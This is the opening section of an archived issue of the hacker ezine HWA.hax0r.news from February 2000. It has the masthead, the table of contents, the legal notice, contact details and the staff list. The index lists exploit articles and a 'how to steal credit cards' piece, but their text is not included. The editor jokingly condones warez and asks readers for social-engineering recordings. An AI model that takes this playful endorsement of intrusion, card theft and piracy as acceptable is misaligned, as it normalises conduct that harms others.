💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn50.… captured on 2021-12-04 at 18:04:22.
-=-=-=-=-=-=-
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 50 Volume 2 Issue 2 1999 Feb 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================
Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/
==========================================================================
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #50 covering Jan 16th to Feb 13th, 2000
==========================================================================
"Taking a fat cross section of the underground and security scene today
and laying it your lap for tomorrow."
==========================================================================
__ __ _ _____ _ _ _ ___
\ \ / /_ _ _ __ | |_|_ _|__ | | | | ___| |_ __|__ \
\ \ /\ / / _` | '_ \| __| | |/ _ \| |_| |/ _ \ | '_ \ / /
\ V V / (_| | | | | |_ | | (_) | _ | __/ | |_) |_|
\_/\_/ \__,_|_| |_|\__| |_|\___/|_| |_|\___|_| .__/(_)
|_|
How Can I Help ??
~~~~~~~~~~~~~~~~~
I'm looking for staff members to help with putting the zine together
if you want your name in lights (ie: mad propz and credz in here) and
have the time to spare, then here are some of the areas I can use help
in:
The Big One:
~~~~~~~~~~~
Text to HTML project: This entails converting all existing texts to
HTML and including, were appropriate the hyperlinks for urls mentioned
in text.
Foreign Correspondants and Translators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I'm also looking for people willing to translate articles from their
area (usually Dutch, German, Norwegian etc) to contribute articles
and if possible translate them into english for us. You will be
marked as HWA staff on our list, please include your email and
website info, and bio if you wish to do so, none of this is required
however. Your help is appreciated!
Site Design
~~~~~~~~~~~
I need some design ideas for the website, i've temporarily revamped it
but i'd like to test some new look and feel ideas, if you're a web
wizard and want to try your hand at making us a site, email me, and
go for it, be warned that we may NOT use your design, but don't let
that stop you from trying your hand at it. An online temp/demo site
would be helpful.
News Collection:
~~~~~~~~~~~~~~~
There are a LOT of sources and resources, many listed here and others
in the ether, search these or pick a few of these sources to search
for stories of interest and email them to me. Scan for hacked, hacking
cracked, cracking, defacement, DoS attack, Cyber cyberwar, etc as an
example.
CGI and PERL script programming
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I'd like to make the zine contents searchable by keyword/issue online
and also display the indexes of online copies of the newsletter. If
you have any ideas for this let me know, I could do it myself but If
you already have a project laying around that would do for this then
why reeinvent the wheel?
Also; data grabbers that will snag the news from sites like HNN and
strip the HTML off and email the raw news data, etc, headline collectors
for security-focus and packetstorm etc are all also good ideas.
Theres more of course, if you have something you'd like to contribute
let me know and i'll find something for you to do. Thanks for listening
cruciphux@dok.org
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #50
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. Slash, Croatian cracker, speaks out...............................
04.0 .. The hacker sex chart 2000 ........................................
05.0 .. Peer finally arrested after over a decade of IRC terrorism........
06.0 .. Updated proxies list from IRC4ALL.................................
07.0 .. Rant: Mitnick to go wireless?.....................................
08.0 .. Distrubuted Attacks on the rise. TFN and Trinoo. .................
09.0 .. Teen charged with hacking, flees to Bulgaria, still gets busted...
10.0 .. Major security flaw in Microsoft (Say it ain't so!! haha).........
11.0 .. Cerberus Information Security Advisory (CISADV000126).............
12.0 .. "How I hacked Packetstorm Security" by Rainforest Puppy...........
13.0 .. stream.c exploit .................................................
14.0 .. Spank, variation of the stream.c DoS..............................
15.0 .. Canadian Security Conference announcement: CanSecWest.............
16.0 .. Security Portal Review Jan 16th...................................
17.0 .. Security Portal review Jan 24th...................................
18.0 .. Security Portal review Jan 31st...................................
19.0 .. CRYPTOGRAM Jan 15th...............................................
20.0 .. POPS.C qpop vulnerability scanner by Duro.........................
21.0 .. Hackunlimited special birthday free-cdrom offer...................
22.0 .. HACK MY SYSTEM! I DARE YA! (not a contest)........................
23.0 .. PWA lead member busted by the FBI.................................
24.0 .. Mitnick's Release Statement.......................................
24.1 .. More submitted Mitnick articles...................................
25.0 .. Hackers vs Pedophiles, taking on a new approach...................
26.0 .. SCRAMDISK (Windows) on the fly encryption for your data...........
27.0 .. HNN:Jan 17: MPAA files more suits over DeCSS......................
28.0 .. WARftpd Security Alert (Will they EVER fix this software??).......
29.0 .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ............
30.0 .. HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands......
31.0 .. HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ........
32.0 .. Owning sites that run WebSpeed web db software....................
33.0 .. Cerberus Information Security Advisory (CISADV000202).............
34.0 .. Seccurity Focus Newsletter #26....................................
35.0 .. HNN: Jan 17: NY Student Arrested After Damaging School Computer...
36.0 .. HNN: Jan 17: NSA Wants A Secure Linux ............................
37.0 .. HNN: Jan 17: Cryptome may be breaaking the law....................
38.0 .. HNN: Jan 21: H4g1s Member Sentenced to Six Months ................
39.0 .. HNN: Jan 21: Smurf Attack Felt Across the Country ................
40.0 .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net ..........
41.0 .. HNN: Jan 21: False Bids Submitted, Hackers Blamed ................
42.0 .. HNN: Jan 21: UK to create cyber force.............................
43.0 .. HNN: Jan 21: Army Holds Off Cyber Attack .........................
44.0 .. HNN: Jan 24: French smart card expert goes to trial...............
45.0 .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack ....
46.0 .. HNN: Jan 24: Viruses Cost the World $12.1 Billion ................
47.0 .. HNN: Jan 24: L0pht and @Stake Create Controversy ($)..............
48.0 .. HNN: Jan 24: Several New Ezine Issues Available ..................
49.0 .. HNN: Jan 25: AIM Accounts Susceptible to Theft ...................
50.0 .. HNN: Jan 25: Outpost Leaks Customer Info .........................
51.0 .. HNN: Jan 25: DeCSS Author Raided .................................
52.0 .. HNN: Jan 25: Solaris May Go Free and Open ........................
53.0 .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication.
54.0 .. HNN: Jan 25: Japan Needs US Help With Defacements ...............
55.0 .. HNN: Jan 25: Car Radios Monitored by Marketers ...................
56.0 .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers ..........
57.0 .. HNN: Jan 26: Support for DeCSS Author Grows ......................
58.0 .. HNN: Jan 26: China To Require Crypto Registration ................
59.0 .. HNN: Jan 26: NEC Develops Network Encryption Technology ..........
60.0 .. HNN: Jan 26: UPS announces Worldtalk secure email.................
61.0 .. HNN: Jan 27: Napster Reveals Users Info ..........................
62.0 .. Dissecting the Napster system.....................................
63.0 .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse ....................
64.0 .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law ......
65.0 .. HNN: Jan 27: Data From Probes of Takedown.com ....................
66.0 .. HNN: Jan 27: Top Ten Viruses of 1999 .............................
67.0 .. HNN: Jan 27: French Eavesdrop on British GSM Phones ..............
68.0 .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack.....
69.0 .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!...
70.0 .. HNN: Jan 31: MS Issues Security Patch for Windows 2000 ...........
71.0 .. HNN: "Have script Will destroy" - a buffer overflow article.......
72.0 .. HNN: Cert Warning? : what me worry?? - buffer overflow article....
73.0 .. HNN: The Japanese Panic Project - buffer overflow article.........
74.0 .. HNN: Jan 31 Bulgarian Indicted for Cyber Crime ..................
75.0 .. HNN: Jan 31: Online Banking Still Immature .......................
76.0 .. HNN: Jan 31: E-Mail Scanning System In Progress ..................
77.0 .. HNN: Jan 31: USA Today Headlines Changed .........................
78.0 .. HNN: Jan 31: @Stake and L0pht ....................................
79.0 .. HNN: Jan 31: Book Review: "Database Nation".......................
80.0 .. HNN: Feb 1st: Interview with DeCSS Author ........................
81.0 .. HNN: Feb 1st: X.com Denies Security Breach .......................
82.0 .. HNN: Feb 1st: Microsoft Security, An Oxymoron? ...................
83.0 .. HNN: Feb 1st; Cringely, Defcon, E-Commerce and Crypto ............
84.0 .. HNN: Feb 1st: Cold War Spies For Hire ............................
85.0 .. HNN: Feb 1st: More Ezines Available ..............................
86.0 .. HHN: Feb 2nd: WorldWide Protest Against MPAA Planned .............
87.0 .. HNN: Feb 2nd; DoubleClick Receiving Protests .....................
88.0 .. HNN: Feb 2nd: More CC Numbers Found on Net .......................
89.0 .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire .............
90.0 .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales ................
91.0 .. HNN: Feb 2nd: Web Aps, the New Playground ........................
92.0 .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests.
93.0 .. HNN: Feb 3rd: Curador Posts More CC Numbers ......................
94.0 .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps ......................
95.0 .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info ................
96.0 .. HNN: Feb 4th: 27 Months for Piracy ...............................
97.0 .. Have you been looking for www.hack.co.za?.........................
98.0 .. HNN: Feb 4th; Security Holes Allow Prices to be Changed ..........
99.0 .. ThE,h4x0r.Br0z toss us a dis .....................................
100.0 .. HNN: Feb 4th: Carders Congregate in IRC ..........................
101.0 .. HNN: Feb 4th; Tempest Tutorial and Bug Scanning 101 ..............
102.0 .. HNN: Feb 7th; Mitnick to Give Live Interview ....................
103.0 .. HNN: Feb 7th; Anti MPAA Leafletting Campaign a Huge Success ......
104.0 .. HNN: Feb 7th: Founding Member of PWA Busted ......................
105.0 .. HNN: Feb 7th; Teenager Busted for Attempted Cyber Extortion of
$500 ...............................................
106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime .................
107.0 .. HNN: Feb 7th; Philippine President Web Site Defaced ..............
108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law ......
109.0 .. HNN: Feb 8th; Yahoo Taken Offline After Suspected DoS Attack .....
110.0 .. HNN: Feb 8th; New Hack City Video ................................
111.0 .. HNN: Feb 8th; Thailand E-commerce Site Stored Credit Cards on ....
Mail Server.........................................
112.0 .. HNN: Feb 8th; Script Kiddie Training .............................
113.0 .. HNN: Feb 8th; Personal CyberWars .................................
114.0 .. HNN: Feb 8th; Space Rogue Profiled by Forbes .....................
115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's....
Next?...............................................
116.0 .. Trinoo Killer Source Code.........................................
117.0 .. Mixter's guide to defending against DDoS attacks..................
118.0 .. HNN: Feb 9th; Court Authorizes Home Computer Search .............
119.0 .. HNN: Feb 9th; MPAA Makes Deceptive Demands ......................
120.0 .. HNN: Feb 9th; Medical Sites Give Out Info .......................
121.0 .. HNN: Feb 9th; FTC Investigates Amazon Subsidiary on use of.......
Customer Info .....................................
122.0 .. HNN: Feb 9th; Sys Admins Possibly At Fault in Japanese ..........
Defacements .......................................
123.0 .. HNN: Feb 9th; Anonymity and Tracking of the Malicious Intruder...
124.0 .. HNN; Feb 10th; E-Trade, LA Times, Datek, ZD-Net Join List of......
Sites .............................................
125.0 .. HNN: Feb 10th; NIPC Releases Detection Tools ....................
126.0 .. HNN: Feb 10th; The Underground Reaction ..........................
127.0 .. HNN: Feb 10th; Haiku Worm Now on the Loose .......................
128.0 .. HNN: Feb 11th; Investigations Continue, Reports of more Possible..
Attacks Surface ...................................
129.0 .. HNN: Feb 11th;Author of Tool Used in Attacks Speaks .............
130.0 .. HNN: Feb 11th;NIPC Reissues Alert on DDoS .......................
131.0 .. HNN: Feb 11th; Lawmakers Succumb to Kneejerk Reaction ..........
132.0 .. HNN: Feb 11th; Humor in the Face of Chaos .......................
133.0 .. HNN: Feb 11th; Britain Passes Despotic Laws .....................
134.0 .. HHN: Feb 11th; France Sues US and UK over Echelon ..............
135.0 .. HNN; Feb 11th; Mellissa Virus Comes Back ........................
136.0 .. HWA: aKt0r's story by wyzewun....................................
137.0 .. ISN: Jan 16:Hacker gang blackmails firms with stolen files.......
138.0 .. How to steal 2,500 credit cards..................................
139.0 .. Good IDS article from Security Portal............................
140.0 .. Win2000 security hole a 'major threat'...........................
141.0 .. New hack attack is greater threat than imagined..................
142.0 .. NSA gets bitten in the ass too...................................
143.0 .. rzsz package calls home if you don't register the software.......
144.0 .. Clinton calls Internet Summit on the DDoS threat.................
145.0 .. ISN: Who gets your trust?........................................
146.0 .. ISN: Hackers demand 10 Million pounds from Visa..................
147.0 .. ISN: Cybercrime growing harder to prosecute......................
148.0 .. ISN: Hacking Exposed (Book review) By Brian Martin...............
149.0 .. ISN: The crime of punishment by Brian Martin.....................
150.0 .. ISN: EDI Security, Control and,Audit(Book review)by Brian Martin.
151.0 .. ISN: "Remember, some 'hackers' make house calls" ie:burglary.....
152.0 .. ISN Japanese Police crack down on hacker attacks.................
153.0 .. ISN:Behind the scenes at "Hackers Inc."..........................
154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???)..........
155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke........
156.0 .. ISN: Sites cracked with id's and passwords.......................
157.0 .. ISN: Who are these jerks anyway?.................................
158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer..........
159.0 .. SSHD Buffer overflow exploit (FreeBSD)...........................
160.0 .. Mozilla curiosity................................................
161.0 .. Any user can make hard links in Unix.............................
162.0 .. Crash windows boxes on local net (twinge.c)......................
163.0 .. SpiderMap 0.1 Released...........................................
164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow..................
165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS........................
166.0 .. .ASP error shows full source code to caller......................
167.0 .. Bypassing authentication on Axis 700 Network Scanner.............
168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS.
169.0 .. CERN 3.0A Heap overflow advisory.................................
170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit........
171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit.................
172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1..........
173.0 .. Fool firewalls into opening ports with PASV......................
174.0 .. InetServ 3.0 remote DoS exploit..................................
175.0 .. ppp 1.6.14 shows local user the saved PPP password...............
176.0 .. Another screw up in MS's Java Virtual Machine, breaks security...
177.0 .. mySQL password checking routines insecure........................
178.0 .. Guninski: Outlook and Active Scripting (again, sigh...)..........
179.0 .. Break a BeOS poorman server remotely with url infusion...........
180.0 .. Proftpd (<= pre6) linux ppc remote exploit.......................
181.0 .. Insecure defaults in SCO openserver 5.0.5 leaves the doors open.
182.0 .. Malformed link in SERVU then a list = instant DoS (crash!).......
183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit...................
184.0 .. Yet another War-ftpd vulnerabilty (why do ppl use this?).........
185.0 .. Z0rk a Zeus Web Server DoS.......................................
186.0 .. Following up on the DDOS attacks of the past week (various)......
187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit..................
188.0 .. Bugfest! Win2000 has 63,000 'defects'............................
189.0 .. Legit Hackers Roam Cyberspace for Security.......................
190.0 .. Deutch controversy raises security questions for Internet users..
191.0 .. PC's Vulnerable to Security Breaches, Experts Say................
192.0 .. Hacking hazards come with Web scripting territory ...............
193.0 .. Microsoft battles pair of security bugs .........................
194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data....
195.0 .. How Safe Is AOL 5.0?.............................................
196.0 .. Teens steal thousands of net accounts............................
197.0 .. Online Credit Hacker May Be Out For Profit.......................
=-------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.
Ha.Ha .. Humour and puzzles ............................................
Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 ,, Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................
* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
more to be added. Quicker to get to the news, and info etc... - Ed
=--------------------------------------------------------------------------=
@HWA'99, 2000
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS
(SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE
ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL
I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS
ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT
AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD
** USE NO HOOKS **
Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known, if its good enough for CNN its good enough for me. And
i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts
Warez Archive?), and does not condone 'warez' in any shape manner or
form, unless they're good, fresh 0-day and on a fast site. <sic>
cruciphux@dok.org
Cruciphux [C*:.] HWA/DoK Since 1989
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~ are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that
some places it is cost prohibitive but if you have the time and
money be a cool dude / gal and send a poor guy a postcard
preferably one that has some scenery from your place of
residence for my collection, I collect stamps too so you kill
two birds with one stone by being cool and mailing in a postcard,
return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use
for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
Spikeman .........................: World Media/IRC channel enforcer
HWA members ......................: World Media
Armour (armour@halcon.com.au).....: Australia
Wyze1.............................: South Africa
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count
paying taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
news events its a good idea to check out issue #1 at least and possibly
also the Xmas 99 issue for a good feel of what we're all about otherwise
enjoy - Ed ...
@HWA
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker loophole BlkOps
vetesgirl Slash bob- CHEVY*
Dragos Ruiu pr0xy
Folks from #hwa.hax0r,news and other leet secret channels,
*grin* - mad props! ... ;-)
Ken Williams/tattooman ex-of PacketStorm,
&
Kevin Mitnick (free at last)
Kevin is due to be released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/
kewl sites:
+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW -> ** Due to excessive network attacks
this site is now being mirrored
at http://www.siliconinc.net/hack/
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
